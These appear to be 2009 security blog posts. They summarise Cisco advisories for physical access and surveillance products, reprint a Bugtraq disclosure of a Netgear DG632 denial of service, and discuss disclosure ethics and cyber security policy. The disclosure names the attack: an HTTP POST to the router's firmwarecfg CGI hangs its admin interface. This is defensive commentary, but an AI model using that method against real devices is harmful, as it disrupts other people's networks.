Tuesday, June 30, 2009

Cisco Security Advisories

Wow! Late June saw a lot of action on the Cisco front when it comes to security advisories. Over the course of 3 days, June 24th, 25th and 26th, there were 8 updates. Of these, 2 were new while the other 8 were updates to advisories published on March 25th of this year. The two new advisories were focused on vulnerabilities in Cisco's physcial security technologies.

Cisco Physical Access Gateway
The first is a denial of service vulnerability in the Cisco Physical Access Gateway product. An attacker sending specially crafted packets can create a memory leak. If this happens, connected door hardware (card readers, locks, etc.) may not function causing the door to remain locked or to remain open. Products affected include software versions prior to 1.1. There are no workarounds however free software updates are available. Additional detail about this vulnerability can be found at - http://www.cisco.com/warp/public/707/cisco-sa-20090624-gateway.shtml

As a penetration tester, physical security is paramount and the closer I can get to your critical assets, the better. If I can open your locked doors using some crafted packets, I can access your facility. At a minimum, I can plug in to your network and that's bad. The flip side of this is also bad. If I can cause your doors to lock and stay locked, I can stop security guards from making their rounds and stop people from getting to work. If these locks are used for egress as well as ingress, there may also be life safety issues as well.

Cisco Video Surveillance Stream Manager
The next advisory relates to the Cisco Video Surveillance Stream Manager firmware for the Cisco Video Surveillance Services Platforms and Cisco Video Surveillance Integrated Services Platforms. A crafted packed can cause a reboot of the system. There is also a vulnerability in the Cisco Video Surveillance 2500 Series IP Camera that could allow an authenticated user to view any file on a vulnerable camera. Cisco has released free software to remediate these vulnerabilities. Detailed information can be found at - http://www.cisco.com/warp/public/707/cisco-sa-20090624-video.shtml

If you have deployed these technologies then you must have determined that video surveillance is an important component of your security program. The DoS vulnerability in Cisco Video Surveillance Stream Manager could result in an extended DoS condition which would effectively blind you. The vulnerability in the cameras could allow a non-privileged user to gain privileged access.

Updates
As I stated previously, the remaining issues are updates to previous advisories. They all relate to Cisco IOS and include a vulnerability with Mobile IP and Mobile IPv6, a cTCP DoS vulnerability, a Session Initiation Protocol DoS vulnerability, a crafted UDP packet vulnerability that affects several IOS features, vulnerabilities with WebVPN and SSLVPN, a privilege escalation vulnerability in Cisco IOS secure copy and a crafted TCP packet vulnerability that affects multiple IOS features. Links to additional information have been included below.

http://www.cisco.com/warp/public/707/cisco-sa-20090325-tcp.shtml

http://www.cisco.com/warp/public/707/cisco-sa-20090325-webvpn.shtml

http://www.cisco.com/warp/public/707/cisco-sa-20090325-udp.shtml

http://www.cisco.com/warp/public/707/cisco-sa-20090325-sip.shtml

http://www.cisco.com/warp/public/707/cisco-sa-20090325-scp.shtml

http://www.cisco.com/warp/public/707/cisco-sa-20090325-ctcp.shtml

http://www.cisco.com/warp/public/707/cisco-sa-20090325-ip.shtml

http://www.cisco.com/warp/public/707/cisco-sa-20090325-mobileip.shtml

Summary
Now that I've thrown a bunch of information at you, I want to put all of this in terms of risk and risk assessment. When I started writing this post, I had a couple of statements about patching and installing updates along the lines of "Please patch". I pulled them out because I realized that I was going against the normal advise that I give. Should you patch or upgrade your software to fix these problems? The short answer is probably yes but that is not the whole story. Simply deploying each and every patch because the vendor says it is a problem is not risk-based security.

I recommend that you take a look at these vulnerabilities. If you are using this technology and if you are affected by the vulnerabilit you need to ask yourselves "what would the impact be to the business if....". For example, the vulnerability with the Cisco IP Cameras would allow an authenticated but non-privileged user to gain privileged access. Do you have non-priveleged users? If not, does it make sense to install the patch? If you do have non-privileged users, what would happen if they gained priviliged access? What do you believe is the likelihood that that particular vulnerability could be expanded to allow unauthenticated users access?

I understand that this seems more complicated than simply deploying the patch and in some cases, it may be but consider an environment with 500 cameras. How many man hours will be requred to push out the patch to that many cameras? If it will take 1 hour to deploy each patch, that's 500 man-hours. Assuming a simple per man-hour cost of $100, that is a cost to deploy the patch of $50,000. Would the potential impact of the vulnerability cost the orgnization more or less than $50,000. What about other technologies. Deploying a patch on a purpose-built device like a camera may have little down side but what about deploying a similar patch to a critical application or a core operating sytem. Way back when SQL Slammer came out I had a customer who relied on SQL databases. They were unaffected by the worm but the patch caused days of downtime because it broke other applications.

I know I am over simplifying things but the concept is sound. When it comes to security, it is important to understand the potential negative impact to the business, the likelihood of a problem and the costs/risks associated with remediation.


Monday, June 15, 2009

Netgear Vulnerability - Disclosure Notification

Today the members of the Bugtraq mailing list received a notification about an email in a Netgear DG623 router. The text of this email reads as follows:

Product Name: Netgear DG632 Router
Vendor: http://www.netgear.com
Date: 15 June, 2009
Author: tom@tomneaves.co.uk
Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt
Discovered: 18 November, 2006
Disclosed: 15 June, 2009

I. DESCRIPTION
The Netgear DG632 router has a web interface which runs on port 80. This allows an admin to login and administer the device's settings. However, a Denial of Service (DoS) vulnerability exists that causes the web interface
to crash and stop responding to further requests.

II. DETAILS
Within the "/cgi-bin/" directory of the administrative web interface exists a file called "firmwarecfg". This file is used for firmware upgrades. A HTTP POST request for this file causes the web server to hang. The web server will stop responding to requests and the administrative interface will become inaccessible until the router is physically restarted.

While the router will still continue to function at the network level, i.e. it will still respond to ICMP echo requests and issue leases via DHCP, an administrator will no longer be able to interact with the administrative web interface.

This attack can be carried out internally within the network, or over the Internet if the administrator has enabled the "Remote Management" feature on the router.

Affected Versions: Firmware V3.4.0_ap (others unknown)

III. VENDOR RESPONSE
12 June, 2009 - Contacted vendor.
15 June, 2009 - Vendor responded. Stated the DG632 is an end of life product and is no longer supported in a production and development sense, as such, there will be no further firmware releases to resolve this issue.

IV. CREDIT
Discovered by Tom Neaves


This posting elicits so may comments that I don't really know where to start so I've tried to break things down a bit to make the discussion easier to follow.

Vulnerability Severity
First I'd like to address the perceived severity of this vulnerability. It is a denial of service attack against a platform that is most commonly used in the home or SOHO environments. This combination means that most mid sized or larger organizations will likely pay little attention to it. This is a mistake for a few reasons. First, and speaking to small, medium and large organizaiton, you may not used SOHO devices but your users do and they, in turn, connect to your network. This may be via VPN (through the SOHO router), directly using various protocols, or simply by bringing ther laptop from their vulnerable home environment to your "protected" work environment. In short, problems with these devices affect you directly.

Now you may say that this is "just" a DoS problem and isn't going to have an effect. At a minimum, it can effect the productivity of your users. Let's consider an extremely situation - you have a user who is working on a proposal that needs to be turned in on a specific date and time. If their router gets nailed it may delay the proposal causing you to lose the business. From a more day-to-day perspective, many organizations allow teleworking. If they cannot connect to the business network, their productivity will be impacted costing your organization money. If your corporate network, or even a single switch on that network, went down, you'd ensure the problem was addressed ASAP. From the perspective of a teleworker, a DoS attack against their SOHO router are exactly the same as the loss of a corporate switch.

Finally, DoS attacks have a way of turning into other types of attacks - possibly allowing the attacker to gain control over the SOHO router. if that happens, it results in a whole new set of problems for business with users who rely on these systems.

Vulnerability Disclosure
OK, now that we've covered the fact that we should care about this kind of problem, I want to talk a bit about vulnerability disclosure. In this case, that problem was identified in November of 2006 and was posted on Bugtraq on June 15th of 2009 - 2 years and 7 months later. This means that people have been using vulnerable equipment for all that time without knowing it or having any ability to do something about it. That, to me, is a problem. Even now, becuse the product is "end of life" there is not patch available but purchasing a new box - again, a scary situation.

I don't want to come across as an alarmist. The issues affecting this particular device are unlikely to represent a significant security risk to any organization but this problem of vulnerability disclosure is multiplied throughout the industry on virtually every singel technology in existence making it a situation that is relevant to everyone. Now comes the point where I outline a bunch of questions with few answers:

Security researches spend time "hacking" technology. By hacking, I'm referring to the term in the original context, not the media driven "attacker" definition. These researches hack technology for a variety of reasons. It may be part of an authorized penetration test or they may work for a company with a vested interest in vulnerability identification (e.g. a security product vendor, etc.). Often, they just do it for fun. In any case, they discover a vulnerability. This leads them to the first question. Do they notify the vendor, disclose the problem to the public, sell it to the highest bidder......?

If they notify the vendor, they may get a positive response. They may also get brushed off and ignored. They may get critisized or, in rare situations, they may be the target of legal actions or "illegal reverse engineering" or similar "crime". In any of these cases, vendor notification resulting in positive, short term actions by the vendor are not the majority leaving the users of the technoloy vulnerable and ignorant.

If they decide to publish the problem on the Internet making it available to the public the will likely be contacted by the vendor, and/or the vendor's lawyers. The public may be able to, if they are made aware of the problem, implement some controls to reduce their risk level but the security researcher is also putting their discovery in the hands of the bad guys also. In effect, they take off the white hat and put on the grey one.

There are also organizaitons out there who will buy vulnerabilities. This puts some money in the pockets of the reseachers but comes really close to "black hat" work.

This is a bit of a sticky situation and gets more so when you look at the concept of pay. Many vulnerability researchers are either independent consultants or do this type of work as a hobby in addition to their normal 9-to-5. They spend countless hours performing quality analysis for some vendor for free. When they do identify something and turn it in to the vendor, the vendor in turn has the opportunity to make their product better. Shouldn't the researches receive some compensation for the QA work that should have been done by the vendor in the first place? Like I said, this is a sticky subject.

Attack Vectors
The last thing I want to talk about is the way this vulnerability can be attacked. According to the article - "This attack can be carried out internally within the network, or over the Internet if the administrator has enabled the "Remote Management" feature on the router." This seems to imply that if "Remote Management" has not been enabled, this attack is not exploitable from the Internet. While I haven't tested it, I would suspect that Cross-site scripting (XSS) and Cross-site request forgery (CSRF) attacks may also be used to attack the system even of the direct external access is not possible.





Tuesday, June 9, 2009

New Podcast

I have just taken my first step into podcasting. In this case, I recorded a discussion about the 10 most dangerous security mistakes I see organizations making when I conduct security assessments. Unfortunately, these mistakes occur far too often and make real security exceptionally difficult. I'll apologize in advance for the quality of the audio editing. I'll get better. I promise.

Wednesday, June 3, 2009

Cyber Security Czar

The White House continues to talk about creating a cyber security coordinator or cyber security czar. Comments from the administration talk about the threat of cyber attacks on our critical infrastructure and of cyber terrorism. My first response - FINALLY! Finally someone is taking the threat seriously. That said, I do not understand what a cyber security czar would actually do.

Many of the articles I have read on the subject talk about the administration's "plan to keep government and commercial information on the Internet safe from cyber criminals or terrorists." They talk about forming partnerships with state and local governments as well as with the private sector and about focusing on training and education. These are all good things but they won't really help make things more secure.

The only way for the federal government to make things more secure is to pass laws or set policy that everyone must comply with. Education won't do it because there are too many organizations that, as a result of ignorance, incompetence or arrogance, won't do the right things. That's why the government has put in place regulations like HIPAA, 21 CFR Part 11, GLBA and Sarbanes-Oxley. That's why the credit card companies put in place PCI DSS. The problem is that these measures just don't work. The minute you think you have created a checklist of minimum mandatory requirements, you have really created the only list of requirements that many organizations will follow. You have also given the bad guys a template of what your securty will look like. In effect, you have made security weaker.

Federal regulations and PCI have taken the wrong approach when it comes to cyber security. This is because they are trying to define the controls that need to be put in place. Unfortunately, information technology is too complex, companies are too diverse and the threat landscape is too dynamic for that to work. The minute you define a control requirement, bad guys find a way around it. The regulations then have to change but that process takes much too much time. Control focused regulatory requirements also create the impression that compliance equals security. That is simply not the case.

So, if the current regulatory requirements are the wrong approach, what is the right one? I'm glad you asked. The short answer is - responsibility. Organizations should be held responsible for the results of their security mesures, not on the measures themselves. If an organization has really bad security but never suffers a breach or compromise, is there a problem? If an organziation is 100% compliant with all regulations but they suffer a compromise that discloses credit card numbers and results in identity theft for thousands did being compliant help? The answers to these questions should be self evident. Unfortunatley, our current regulatory climate would praise the second organization while punishing the first. My thoughts are simple. Hold organizations accountable for effectively securing sensitive data - or more specifically, data that if modified, altered or destroyed, would negatively affect others. Many of the various state privacy laws to this. Let organziations secure their environments as the see fit but hold them accountable for failure. It doesn't take a cyber security czar or a Cybersecurity Act of 2009 to do this. It take a couple of things. First, it requires a national description of what "sensitive" data is. This list doesn't need to be that large but would include personal information that could be used for identity theft, personal medical records, personal financial records (including credit card data), classified government information and the like. Once this definition has been established, two things need to happen; a law needs to be passed that would result in penalties should these data be disclosed and a law needs to be passed (perhaps an expansion of the Computer Fraud and Abuse Act) that makes it a crime to access these data without authorization.

What would the effect of this be? Of course I don't know for sure but here's my guess. Nothing would happen initially until the first few public cases of fines or other penalties levied against organizations who let their sensitive data be compromised were on the nightly news. This would serve as a wake up call (hopefully) making organizations approach security as a matter of risk management rather than as a checkbox that needs to be checked. Would it work? I don't know but I believe it would be better than what is happening today.